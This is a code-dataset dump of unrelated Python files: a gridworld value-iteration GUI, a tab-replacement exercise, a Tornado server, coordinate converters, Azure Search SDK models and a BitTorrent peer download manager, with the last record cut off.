direction=='Left' and (columnindex==0 or (rowindex==1 and columnindex==2)):\n return (rowindex,columnindex)\n elif direction=='Up' and (rowindex==0 or (rowindex==2 and columnindex==1)):\n return (rowindex,columnindex)\n elif direction=='Down' and (rowindex==2 or (rowindex==0 and columnindex==1)):\n return (rowindex,columnindex)\n elif direction=='Right':\n return (rowindex,columnindex+1)\n elif direction=='Left':\n return (rowindex,columnindex-1)\n elif direction=='Up':\n return (rowindex-1,columnindex)\n elif direction=='Down':\n return (rowindex+1,columnindex)\n\n def calculatemax(state,v): # find Optimal Action From a state\n P=[0.8,0.1,0.1]\n actionsu=[0 for i in actions]\n for i in range(len(actions)):\n if actions[i]=='Right' or actions[i]=='Left':\n actionscan=[actions[i],'Down','Up']\n elif actions[i]=='Up' or actions[i]=='Down':\n actionscan=[actions[i],'Right','Left']\n for j in range(len(actionscan)):\n nextstate=predictnext(state.rowindex,state.columnindex,actionscan[j])\n if nextstate[0]==0 and nextstate[1]==3:\n actionsu[i]+=P[j]*(diamondreward+(discount*v[nextstate[0]][nextstate[1]]))\n elif nextstate[0]==1 and nextstate[1]==3:\n actionsu[i]+=P[j]*(firereward+(discount*v[nextstate[0]][nextstate[1]]))\n else:\n actionsu[i]+=P[j]*(livingreward+(discount*v[nextstate[0]][nextstate[1]]))\n maxindex=0\n maxvalue=actionsu[0]\n for j in range(1,len(actions)):\n if actionsu[j]>maxvalue:\n maxvalue=actionsu[j]\n maxindex=j\n return (maxvalue,actions[maxindex])\n\n # Initialize Variables -- Start\n\n for i in range(3): ## making states\n for j in range(4):\n if i==0 and j==3:\n v_[i].append(State(i,j,diamondreward,'Diamond'))\n elif i==1 and j==1:\n v_[i].append(State(i,j,livingreward,'Block'))\n elif i==1 and j==3:\n v_[i].append(State(i,j,firereward,'Fire'))\n else:\n v_[i].append(State(i,j,livingreward))\n v=[[i.V for i in v_[0]],[i.V for i in v_[1]],[i.V for i in v_[2]]]\n\n Policy=[['none' for i in range(4)] for i in range(3)] # For Save Action Policy for each state.\n iterations=0 # Counting iteration of while loop\n\n # Initialize Variables -- End\n\n # Value Iteration -- Start\n while True:\n iterations+=1\n delta=0\n v=[[i.V for i in v_[0]],[i.V for i in v_[1]],[i.V for i in v_[2]]]\n for i in range(3):\n for j in range(4):\n if not ((i==0 and j==3) or (i==1 and j==3) or (i==1 and j==1)): \n temp=calculatemax(v_[i][j],v)\n v_[i][j].V=temp[0]\n Policy[i][j]=temp[1]\n if abs(v_[i][j].V -v[i][j])>delta:\n delta = abs(v_[i][j].V-v[i][j])\n if delta < (epsilon*(1-discount))/discount:\n break\n # Value Iteration -- End\n\n # Create graphical table -- Start\n for i in range(3): \n for j in range(4):\n label = QtWidgets.QLabel(self.Form)\n label.setFixedWidth(100)\n label.setFixedHeight(100)\n if Policy[i][j]!='none':\n label.setPixmap(QtGui.QPixmap(f\"img/{Policy[i][j]}.png\"))\n elif v_[i][j].role in (('Diamond', 'Fire')):\n label.setPixmap(QtGui.QPixmap(f\"img/{v_[i][j].role}.png\"))\n else:\n label.setStyleSheet('background-color:black;')\n self.gridLayout_2.addWidget(label, i, j, 1, 1)\n\n label = QtWidgets.QLabel(self.Form)\n label.setFixedHeight(50)\n label.setText(f'This is The Result After {iterations} iterations . ')\n label.setStyleSheet('font-size:20px;')\n self.gridLayout_2.addWidget(label, 3, 0, 1, 4)\n # Create graphical table -- End\n\n print(Policy,iterations)\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QMainWindow()\n ui = gameboard()\n epsilon=0.00001\n discount=0.99\n livingreward=-1\n firereward=-1\n diamondreward=1\n ui.setupUi(Form,epsilon,discount,livingreward,firereward,diamondreward)\n Form.show()\n sys.exit(app.exec_())\n\n","sub_path":"GUI_Version/gameboard.py","file_name":"gameboard.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"369717377","text":"'''\n11. タブをスペースに置換\nタブ1文字につきスペース1文字に置換せよ.確認にはsedコマンド,trコマンド,もしくはexpandコマンドを用いよ.\n'''\nimport sys\n\n# 読み込み\nwith open(sys.argv[1], \"r\") as f:\n for line in f:\n print(line.rstrip().replace(\"\\t\", \" \"))\n\n# sed -e 's/ //g' hightemp.txt\n# https://rcmdnk.com/blog/2016/09/13/computer-gnu-bsd-linux-mac/\n\n# tr '\\t' ' ' < hightemp.txt\n\n# expand -t 1 hightemp.txt\n# https://webkaru.net/linux/expand-command/","sub_path":"yoshimura/chapter02/knock11.py","file_name":"knock11.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"149561086","text":"\n\nfrom xai.brain.wordbase.verbs._glean import _GLEAN\n\n#calss header\nclass _GLEANS(_GLEAN, ):\n\tdef __init__(self,): \n\t\t_GLEAN.__init__(self)\n\t\tself.name = \"GLEANS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"glean\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_gleans.py","file_name":"_gleans.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589135834","text":"import tornado.ioloop\nimport tornado.web\nimport os\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"static/E5.html\")\n\nclass MainHandler_post(tornado.web.RequestHandler):\n def post(self):\n num1=self.get_argument('num1')\n num2=self.get_argument('num2')\n if int(num2)<int(num1):\n print(num1)\n self.write(num1)\n else:\n print(num2)\n self.write(num2)\n\ndef make_app():\n settings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n}\n return tornado.web.Application([\n (r\"/\", MainHandler),\n (r'/post_test/', MainHandler_post),\n], **settings)\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(8888)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"kadai/E5.py","file_name":"E5.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"357951083","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport csv\nimport sys\nimport math\nimport argparse\nfrom transform_coord.coordTransform_utils import gcj02_to_bd09\nfrom transform_coord.coordTransform_utils import bd09_to_gcj02\nfrom transform_coord.coordTransform_utils import wgs84_to_gcj02\nfrom transform_coord.coordTransform_utils import gcj02_to_wgs84\nfrom transform_coord.coordTransform_utils import bd09_to_wgs84\nfrom transform_coord.coordTransform_utils import wgs84_to_bd09\n\n# Configuration\n# Input file name\nINPUT = ''\n# Output file name\nOUTPUT = ''\n# Convert type: g2b, b2g, w2g, g2w, b2w, w2b\nTYPE = ''\n# lng column name\nLNG_COLUMN = ''\n# lat column name\nLAT_COLUMN = ''\n# Skip invalid row\nSKIP_INVALID_ROW = False\n\n\ndef convert():\n with open(INPUT, 'r') as input_file:\n input_file_reader = csv.reader(input_file)\n headers = next(input_file_reader)\n lng_index, lat_index = get_lng_lat_index(headers)\n results = []\n\n for index, row in enumerate(input_file_reader):\n result = []\n try:\n result = convert_by_type(float(row[lng_index]), float(row[lat_index]), TYPE)\n except ValueError:\n # Deal with ValueError(invalid lng or lat)\n # print(index + 2, row[lng_index], row[lat_index]) # '+ 2' is due to zero-based index and first row is header\n result = row[lng_index], row[lat_index]\n results.append(result)\n\n with open(OUTPUT, 'w') as output_file:\n output_file_writer = csv.writer(output_file)\n\n with open(INPUT, 'r') as input_file:\n input_file_reader = csv.reader(input_file)\n headers = next(input_file_reader)\n lng_index, lat_index = get_lng_lat_index(headers)\n\n output_file_writer.writerow(headers)\n for index, row in enumerate(input_file_reader):\n row[lng_index] = results[index][0]\n row[lat_index] = results[index][1]\n if type(row[lng_index]) is not float or type(row[lat_index]) is not float:\n # Data is invalid\n if SKIP_INVALID_ROW:\n # Skip invalid row\n pass\n else:\n # Reserve invalid row\n output_file_writer.writerow(row)\n else:\n # Data is valid\n output_file_writer.writerow(row)\n\n\ndef get_lng_lat_index(headers):\n try:\n if LNG_COLUMN == '' and LAT_COLUMN == '':\n return [headers.index('lng'), headers.index('lat')]\n else:\n return [headers.index(LNG_COLUMN), headers.index(LAT_COLUMN)]\n except ValueError as error:\n print('Error: ' + str(error).split('is', 1)[0] + 'is missing from csv header. Or use -n or -a to specify custom column name for lng or lat.')\n sys.exit()\n\n\ndef convert_by_type(lng, lat, type):\n if type == 'g2b':\n return gcj02_to_bd09(lng, lat)\n elif type == 'b2g':\n return bd09_to_gcj02(lng, lat)\n elif type == 'w2g':\n return wgs84_to_gcj02(lng, lat)\n elif type == 'g2w':\n return gcj02_to_wgs84(lng, lat)\n elif type == 'b2w':\n return bd09_to_wgs84(lng, lat)\n elif type == 'w2b':\n return wgs84_to_bd09(lng, lat)\n else:\n print('Usage: type must be in one of g2b, b2g, w2g, g2w, b2w, w2b')\n sys.exit()\n\n\n# new york standard zone is 18\ndef utm_to_latlng(zone, easting, northing, northernHemisphere=True):\n\n if not northernHemisphere:\n northing = 10000000 - northing\n\n a = 6378137\n e = 0.081819191\n e1sq = 0.006739497\n k0 = 0.9996\n\n arc = northing / k0\n mu = arc / (a * (1 - math.pow(e, 2) / 4.0 - 3 * math.pow(e, 4) / 64.0 - 5 * math.pow(e, 6) / 256.0))\n\n ei = (1 - math.pow((1 - e * e), (1 / 2.0))) / (1 + math.pow((1 - e * e), (1 / 2.0)))\n\n ca = 3 * ei / 2 - 27 * math.pow(ei, 3) / 32.0\n\n cb = 21 * math.pow(ei, 2) / 16 - 55 * math.pow(ei, 4) / 32\n cc = 151 * math.pow(ei, 3) / 96\n cd = 1097 * math.pow(ei, 4) / 512\n phi1 = mu + ca * math.sin(2 * mu) + cb * math.sin(4 * mu) + cc * math.sin(6 * mu) + cd * math.sin(8 * mu)\n\n n0 = a / math.pow((1 - math.pow((e * math.sin(phi1)), 2)), (1 / 2.0))\n\n r0 = a * (1 - e * e) / math.pow((1 - math.pow((e * math.sin(phi1)), 2)), (3 / 2.0))\n fact1 = n0 * math.tan(phi1) / r0\n\n _a1 = 500000 - easting\n dd0 = _a1 / (n0 * k0)\n fact2 = dd0 * dd0 / 2\n\n t0 = math.pow(math.tan(phi1), 2)\n Q0 = e1sq * math.pow(math.cos(phi1), 2)\n fact3 = (5 + 3 * t0 + 10 * Q0 - 4 * Q0 * Q0 - 9 * e1sq) * math.pow(dd0, 4) / 24\n\n fact4 = (61 + 90 * t0 + 298 * Q0 + 45 * t0 * t0 - 252 * e1sq - 3 * Q0 * Q0) * math.pow(dd0, 6) / 720\n\n lof1 = _a1 / (n0 * k0)\n lof2 = (1 + 2 * t0 + Q0) * math.pow(dd0, 3) / 6.0\n lof3 = (5 - 2 * Q0 + 28 * t0 - 3 * math.pow(Q0, 2) + 8 * e1sq + 24 * math.pow(t0, 2)) * math.pow(dd0, 5) / 120\n _a2 = (lof1 - lof2 + lof3) / math.cos(phi1)\n _a3 = _a2 * 180 / math.pi\n\n latitude = 180 * (phi1 - fact1 * (fact2 + fact3 + fact4)) / math.pi\n\n if not northernHemisphere:\n latitude = -latitude\n\n longitude = ((zone > 0) and (6 * zone - 183.0) or 3.0) - _a3\n\n return (latitude, longitude)\n\n\nif __name__ == '__main__':\n\n # print(gcj02_to_wgs84(116.4172, 39.93889))\n\n print(wgs84_to_gcj02(4326, 39.93889))\n\n print(utm_to_latlng(18, 538090.21382165, 4436628.55154459))\n\n # parser = argparse.ArgumentParser(description='Convert coordinates in csv files.', usage='%(prog)s [-h] -i INPUT -o OUTPUT -t TYPE [-n LNG_COLUMN] [-a LAT_COLUMN] [-s SKIP_INVALID_ROW]', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n #\n # group = parser.add_argument_group('arguments')\n #\n # group.add_argument('-i', '--input', help='Location of input file', default=argparse.SUPPRESS, metavar='')\n # group.add_argument('-o', '--output', help='Location of output file', default=argparse.SUPPRESS, metavar='')\n # group.add_argument('-t', '--type', help='Convert type, must be one of: g2b, b2g, w2g, g2w, b2w, w2b', default=argparse.SUPPRESS, metavar='')\n # group.add_argument('-n', '--lng_column', help='Column name for longitude', default='lng', metavar='')\n # group.add_argument('-a', '--lat_column', help='Column name for latitude', default='lat', metavar='')\n # group.add_argument('-s', '--skip_invalid_row', help='Whether to skip invalid row', default=False, type=bool, metavar='')\n #\n # args = parser.parse_args()\n # # print('\\nArguments you provide are:')\n # # for arg in vars(args):\n # # print '{0:20} {1}'.format(arg, str(getattr(args, arg)))\n #\n # # Get arguments\n # if not args.input or not args.output or not args.type:\n # parser.print_help()\n # else:\n # INPUT = args.input\n # OUTPUT = args.output\n # TYPE = args.type\n #\n # if args.lng_column and args.lat_column:\n # LNG_COLUMN, LAT_COLUMN = args.lng_column, args.lat_column\n #\n # if args.skip_invalid_row:\n # SKIP_INVALID_ROW = args.skip_invalid_row\n #\n # convert()\n","sub_path":"transform_coord/coord_converter.py","file_name":"coord_converter.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"80142215","text":"import constants\nimport os\nimport shared\n\ndef enforce_types(*types, return_type=None):\n def decorator(f):\n def new_f(*args, **kwds):\n #we need to convert args into something mutable \n for (a, t) in zip(args, types):\n if not isinstance(a,t):\n raise TypeError(\" [Enforced Types]: Arguments of wrong type passed to function\")\n #feel free to have more elaborated convertion\n result = f(*args, **kwds)\n if return_type:\n if not isinstance(result,return_type):\n raise TypeError(f\" [Enforced Types]: Function returned wrong type \\n Expected {repr(return_type)}. Received {type(result)} \")\n \n return result\n return new_f\n return decorator\n\ndef strip_useless_characters(word):\n for ch in constants.useless_character_list:\n word = word.strip(ch)\n\n return word \n\ndef check_special_characters(word):\n for ch in constants.special_characters:\n if ch in word:\n raise ValueError(f\"The words must not contain these characters: {constants.special_characters}. The word here is {word}\") \n\ndef ret_document_dir_path():\n cur_dirpath = os.getcwd()\n directory = os.path.join(cur_dirpath, constants.documents_directory_name)\n\n return directory\n\ndef map_document_ids():\n\n directory = ret_document_dir_path()\n \n document_id_map = dict()\n\n idx = 1\n\n for filename in os.listdir(directory):\n if filename.endswith(\".txt\"): \n document_id_map[idx] = filename\n idx+=1\n else:\n continue\n\n return document_id_map\n\ndef pretty_print_dict(dict_instance):\n for key in dict_instance:\n print(key, \" : \", dict_instance[key])\n\n\ndef print_base_index():\n pretty_print_dict(shared.BASE_INDEX)\n\ndef pretty_print_doc_result(doc_list):\n if not doc_list:\n print(\"No documents matched the given query\")\n return \n for doc in doc_list:\n print(doc, shared.DOCUMENT_ID_MAP[doc])\n\ndef print_btree_layer(layer):\n print(\"Btree layer:\")\n for node in layer:\n print(str(node), end=\" :\")\n for pair in node.data_pointer_pairs:\n print(f\"({pair.data},{str(repr(pair.pointer))})\", end=\" \")\n print()\n\nif __name__ == \"__main__\":\n print(ret_document_dir_path())\n print(map_document_ids()) ","sub_path":"College Study/sem5/Information Retrival/Assignments/Assign-1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"618612419","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\nimport msrest.serialization\nfrom ._generated.models import LexicalAnalyzer, LexicalTokenizer\n\n\nclass PatternAnalyzer(LexicalAnalyzer):\n \"\"\"Flexibly separates text into terms via a regular expression.\n This analyzer is implemented using Apache Lucene.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the analyzer. It must only contain letters, digits, spaces,\n dashes or underscores, can only start and end with alphanumeric characters, and is limited to\n 128 characters.\n :type name: str\n :param lower_case_terms: A value indicating whether terms should be lower-cased. Default is\n true.\n :type lower_case_terms: bool\n :param pattern: A regular expression to match token separators. Default is an\n expression that matches one or more white space characters.\n :type pattern: str\n :param flags: List of regular expression flags. Possible values of each flag include: 'CANON_EQ',\n 'CASE_INSENSITIVE', 'COMMENTS', 'DOTALL', 'LITERAL', 'MULTILINE', 'UNICODE_CASE', 'UNIX_LINES'.\n :type flags: list[str] or list[~search_service_client.models.RegexFlags]\n :param stopwords: A list of stopwords.\n :type stopwords: list[str]\n \"\"\"\n\n _validation = {\"odata_type\": {\"required\": True}, \"name\": {\"required\": True}}\n\n _attribute_map = {\n \"odata_type\": {\"key\": \"@odata\\\\.type\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"lower_case_terms\": {\"key\": \"lowercase\", \"type\": \"bool\"},\n \"pattern\": {\"key\": \"pattern\", \"type\": \"str\"},\n \"flags\": {\"key\": \"flags\", \"type\": \"[str]\"},\n \"stopwords\": {\"key\": \"stopwords\", \"type\": \"[str]\"},\n }\n\n def __init__(self, **kwargs):\n super(PatternAnalyzer, self).__init__(**kwargs)\n self.odata_type = \"#Microsoft.Azure.Search.PatternAnalyzer\"\n self.lower_case_terms = kwargs.get(\"lower_case_terms\", True)\n self.pattern = kwargs.get(\"pattern\", r\"\\W+\")\n self.flags = kwargs.get(\"flags\", None)\n self.stopwords = kwargs.get(\"stopwords\", None)\n\n\nclass PatternTokenizer(LexicalTokenizer):\n \"\"\"Tokenizer that uses regex pattern matching to construct distinct tokens.\n This tokenizer is implemented using Apache Lucene.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the tokenizer. It must only contain letters, digits, spaces,\n dashes or underscores, can only start and end with alphanumeric characters, and is limited to\n 128 characters.\n :type name: str\n :param pattern: A regular expression to match token separators. Default is an\n expression that matches one or more white space characters.\n :type pattern: str\n :param flags: List of regular expression flags. Possible values of each flag include: 'CANON_EQ',\n 'CASE_INSENSITIVE', 'COMMENTS', 'DOTALL', 'LITERAL', 'MULTILINE', 'UNICODE_CASE', 'UNIX_LINES'.\n :type flags: list[str] or list[~search_service_client.models.RegexFlags]\n :param group: The zero-based ordinal of the matching group in the regular expression to\n extract into tokens. Use -1 if you want to use the entire pattern to split the input into\n tokens, irrespective of matching groups. Default is -1.\n :type group: int\n \"\"\"\n\n _validation = {\"odata_type\": {\"required\": True}, \"name\": {\"required\": True}}\n\n _attribute_map = {\n \"odata_type\": {\"key\": \"@odata\\\\.type\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"pattern\": {\"key\": \"pattern\", \"type\": \"str\"},\n \"flags\": {\"key\": \"flags\", \"type\": \"[str]\"},\n \"group\": {\"key\": \"group\", \"type\": \"int\"},\n }\n\n def __init__(self, **kwargs):\n super(PatternTokenizer, self).__init__(**kwargs)\n self.odata_type = \"#Microsoft.Azure.Search.PatternTokenizer\"\n self.pattern = kwargs.get(\"pattern\", r\"\\W+\")\n self.flags = kwargs.get(\"flags\", None)\n self.group = kwargs.get(\"group\", -1)\n\n\nclass SearchResourceEncryptionKey(msrest.serialization.Model):\n \"\"\"A customer-managed encryption key in Azure Key Vault. Keys that you create and manage can be\n used to encrypt or decrypt data-at-rest in Azure Cognitive Search, such as indexes and synonym maps.\n\n All required parameters must be populated in order to send to Azure.\n\n :param key_name: Required. The name of your Azure Key Vault key to be used to encrypt your data\n at rest.\n :type key_name: str\n :param key_version: Required. The version of your Azure Key Vault key to be used to encrypt\n your data at rest.\n :type key_version: str\n :param vault_uri: Required. The URI of your Azure Key Vault, also referred to as DNS name, that\n contains the key to be used to encrypt your data at rest. An example URI might be https://my-\n keyvault-name.vault.azure.net.\n :type vault_uri: str\n :param application_id: Required. An AAD Application ID that was granted the required access\n permissions to the Azure Key Vault that is to be used when encrypting your data at rest. The\n Application ID should not be confused with the Object ID for your AAD Application.\n :type application_id: str\n :param application_secret: The authentication key of the specified AAD application.\n :type application_secret: str\n \"\"\"\n\n _validation = {\n 'key_name': {'required': True},\n 'key_version': {'required': True},\n 'vault_uri': {'required': True},\n }\n\n _attribute_map = {\n 'key_name': {'key': 'keyVaultKeyName', 'type': 'str'},\n 'key_version': {'key': 'keyVaultKeyVersion', 'type': 'str'},\n 'vault_uri': {'key': 'keyVaultUri', 'type': 'str'},\n 'application_id': {'key': 'applicationId', 'type': 'str'},\n 'application_secret': {'key': 'applicationSecret', 'type': 'str'},\n }\n\n def __init__(\n self,\n **kwargs\n ):\n super(SearchResourceEncryptionKey, self).__init__(**kwargs)\n self.key_name = kwargs['key_name']\n self.key_version = kwargs['key_version']\n self.vault_uri = kwargs['vault_uri']\n self.application_id = kwargs.get('application_id', None)\n self.application_secret = kwargs.get('application_secret', None)\n\n\nclass SynonymMap(msrest.serialization.Model):\n \"\"\"Represents a synonym map definition.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the synonym map.\n :type name: str\n :ivar format: Required. The format of the synonym map. Only the 'solr' format is currently\n supported. Default value: \"solr\".\n :vartype format: str\n :param synonyms: Required. A series of synonym rules in the specified synonym map format. The\n rules must be separated by newlines.\n :type synonyms: str\n :param encryption_key: A description of an encryption key that you create in Azure Key Vault.\n This key is used to provide an additional level of encryption-at-rest for your data when you\n want full assurance that no one, not even Microsoft, can decrypt your data in Azure Cognitive\n Search. Once you have encrypted your data, it will always remain encrypted. Azure Cognitive\n Search will ignore attempts to set this property to null. You can change this property as\n needed if you want to rotate your encryption key; Your data will be unaffected. Encryption with\n customer-managed keys is not available for free search services, and is only available for paid\n services created on or after January 1, 2019.\n :type encryption_key: ~azure.search.documents.models.SearchResourceEncryptionKey\n :param e_tag: The ETag of the synonym map.\n :type e_tag: str\n \"\"\"\n\n _validation = {\n 'name': {'required': True},\n 'format': {'required': True, 'constant': True},\n 'synonyms': {'required': True},\n }\n\n _attribute_map = {\n 'name': {'key': 'name', 'type': 'str'},\n 'format': {'key': 'format', 'type': 'str'},\n 'synonyms': {'key': 'synonyms', 'type': '[str]'},\n 'encryption_key': {'key': 'encryptionKey', 'type': 'SearchResourceEncryptionKey'},\n 'e_tag': {'key': '@odata\\\\.etag', 'type': 'str'},\n }\n\n format = \"solr\"\n\n def __init__(\n self,\n **kwargs\n ):\n super(SynonymMap, self).__init__(**kwargs)\n self.name = kwargs['name']\n self.synonyms = kwargs['synonyms']\n self.encryption_key = kwargs.get('encryption_key', None)\n self.e_tag = kwargs.get('e_tag', None)\n\n\nclass SearchIndexerDataSourceConnection(msrest.serialization.Model):\n \"\"\"Represents a datasource connection definition, which can be used to configure an indexer.\n\n All required parameters must be populated in order to send to Azure.\n\n :param name: Required. The name of the datasource connection.\n :type name: str\n :param description: The description of the datasource connection.\n :type description: str\n :param type: Required. The type of the datasource connection. Possible values include: \"azuresql\",\n \"cosmosdb\", \"azureblob\", \"azuretable\", \"mysql\".\n :type type: str or ~azure.search.documents.models.SearchIndexerDataSourceType\n :param connection_string: The connection string for the datasource connection.\n :type connection_string: str\n :param container: Required. The data container for the datasource connection.\n :type container: ~azure.search.documents.models.SearchIndexerDataContainer\n :param data_change_detection_policy: The data change detection policy for the datasource connection.\n :type data_change_detection_policy: ~azure.search.documents.models.DataChangeDetectionPolicy\n :param data_deletion_detection_policy: The data deletion detection policy for the datasource connection.\n :type data_deletion_detection_policy:\n ~azure.search.documents.models.DataDeletionDetectionPolicy\n :param e_tag: The ETag of the data source.\n :type e_tag: str\n \"\"\"\n\n _validation = {\n 'name': {'required': True},\n 'type': {'required': True},\n 'connection_string': {'required': True},\n 'container': {'required': True},\n }\n\n _attribute_map = {\n 'name': {'key': 'name', 'type': 'str'},\n 'description': {'key': 'description', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'connection_string': {'key': 'connectionString', 'type': 'str'},\n 'container': {'key': 'container', 'type': 'SearchIndexerDataContainer'},\n 'data_change_detection_policy': {'key': 'dataChangeDetectionPolicy', 'type': 'DataChangeDetectionPolicy'},\n 'data_deletion_detection_policy': {'key': 'dataDeletionDetectionPolicy', 'type': 'DataDeletionDetectionPolicy'},\n 'e_tag': {'key': '@odata\\\\.etag', 'type': 'str'},\n }\n\n def __init__(\n self,\n **kwargs\n ):\n super(SearchIndexerDataSourceConnection, self).__init__(**kwargs)\n self.name = kwargs['name']\n self.description = kwargs.get('description', None)\n self.type = kwargs['type']\n self.connection_string = kwargs['connection_string']\n self.container = kwargs['container']\n self.data_change_detection_policy = kwargs.get('data_change_detection_policy', None)\n self.data_deletion_detection_policy = kwargs.get('data_deletion_detection_policy', None)\n self.e_tag = kwargs.get('e_tag', None)\n","sub_path":"sdk/search/azure-search-documents/azure/search/documents/indexes/_internal/_models.py","file_name":"_models.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"429286814","text":"from django.db import models\n\n# special characters for foreign languages (ex. accents)\nfrom django.utils.encoding import smart_unicode\n\n# Create your models here.\n\nclass SignUp(models.Model):\n # basic user information\n first_name = models.CharField(max_length=120, null=True, blank=True)\n last_name = models.CharField(max_length=120, null=True, blank=True)\n email = models.EmailField(null=True, blank=True)\n \n # auto_now_add: when created make timestamp\n # auto_now: when updated or changed, make a note of that timestamp\n timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True)\n \n # status\n diamond = 'd';\n platinum = 'p';\n gold = 'g';\n silver = 's';\n bronze = 'b';\n \n status_choices = (\n (bronze, 'Bronze'),\n (silver, 'Silver'),\n (gold, 'Gold'),\n (platinum, 'Platinum'),\n (diamond, 'Diamond'),\n )\n \n status = models.CharField(max_length=1,\n choices=status_choices,\n default=bronze);\n \n def __unicode__(self):\n return smart_unicode(self.email)","sub_path":"Prototype/src/signups/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297518287","text":"from MediaPlayer.Torrents.Peer.PeerMessages import RequestMessage\nfrom MediaPlayer.Util.Enums import PeerInterestedState, PeerChokeState, PeerState, PeerSpeed\nfrom Shared.LogObject import LogObject\nfrom Shared.Logger import Logger, LogVerbosity\nfrom Shared.Settings import Settings\nfrom Shared.Util import current_time\n\n\nclass PeerDownloadManager(LogObject):\n @property\n def max_blocks(self):\n if self.peer.peer_speed != PeerSpeed.Low:\n self.peer.max_blocks_log = self._fast_peer_max_blocks\n return self._fast_peer_max_blocks\n self.peer.max_blocks_log = self._low_peer_max_blocks\n return self._low_peer_max_blocks\n\n def __init__(self, peer):\n super().__init__(peer, \"download\")\n\n self.peer = peer\n self.stopped = False\n self.downloading = []\n\n self._block_size = Settings.get_int(\"block_size\")\n self._low_peer_max_blocks = Settings.get_int(\"low_peer_max_download_buffer\") // self._block_size\n self._medium_peer_max_blocks = Settings.get_int(\"medium_peer_max_download_buffer\") // self._block_size\n self._fast_peer_max_blocks = Settings.get_int(\"fast_peer_max_download_buffer\") // self._block_size\n\n self.timed_out_blocks = 0\n\n # Logging props\n self.downloading_log = \"\"\n\n def update_requests(self):\n if self.peer.state != PeerState.Started:\n return True\n\n if self.peer.communication_state.out_interest == PeerInterestedState.Uninterested:\n return True\n\n if len(self.downloading) >= self.max_blocks:\n return True\n\n if self.peer.communication_state.in_choke == PeerChokeState.Choked:\n #if len(self.peer.allowed_fast_pieces) == 0:\n return True\n\n # with self.lock:\n # new_blocks = self.max_blocks - len(self.downloading)\n # to_download = self.peer.torrent.download_manager.get_allowed_fast_blocks_to_download(self.peer, new_blocks)\n # for block in to_download:\n # self.downloading.append((block, current_time()))\n #\n # if len(to_download) == 0:\n # return True\n #\n # Logger().write(LogVerbosity.Debug, str(self.peer.id) + \" requesting \" + str(len(to_download)) + \" allowed fast blocks\")\n # self.request(to_download)\n # return True\n\n if current_time() - self.timed_out_blocks < 10000:\n # We have timed out on block we previously requested, don't request new for some time\n return True\n\n new_blocks = self.max_blocks - len(self.downloading)\n to_download = self.peer.torrent.download_manager.get_blocks_to_download(self.peer, new_blocks)\n self.request(to_download)\n return True\n\n def request(self, to_download):\n download_count = len(to_download)\n if download_count > 0:\n Logger().write(LogVerbosity.Debug, str(self.peer.id) + \" going to request \" + str(len(to_download)) + \" blocks. Now \" + str(len(self.downloading)))\n self.peer.protocol_logger.update(\"Sending/receiving requests\", True)\n self.downloading += [(block, current_time(), False) for block in to_download]\n for block in to_download:\n block.add_downloader(self.peer)\n request = RequestMessage(block.piece_index, block.start_byte_in_piece, block.length)\n Logger().write(LogVerbosity.All, str(self.peer.id) + ' Sending request for piece ' + str(request.index) + \", block \" + str(\n request.offset // 16384))\n self.peer.connection_manager.send(request.to_bytes())\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n\n def block_done(self, block_offset, timestamp):\n downloading_block = [(block, request_time, timed_out) for block, request_time, timed_out in self.downloading if block.start_byte_total == block_offset]\n if len(downloading_block) == 0:\n return # Not currently registered as downloading\n\n downloading_block = downloading_block[0]\n round_trip_time = timestamp - downloading_block[1]\n self.peer.adjust_round_trip_time(round_trip_time)\n self.downloading.remove(downloading_block)\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n downloading_block[0].remove_downloader(self.peer)\n\n def update_timeout(self):\n if self.peer is None or self.peer.state != PeerState.Started:\n return True\n\n canceled = 0\n\n timed_out_blocks = [(block, request_time, timed_out) for block, request_time, timed_out in self.downloading\n if current_time() - request_time > self.get_priority_timeout(self.peer.torrent.data_manager._pieces[block.piece_index].priority) and not timed_out]\n\n for block_request in timed_out_blocks:\n block = block_request[0]\n self.downloading.remove(block_request)\n self.downloading.append((block_request[0], block_request[1], 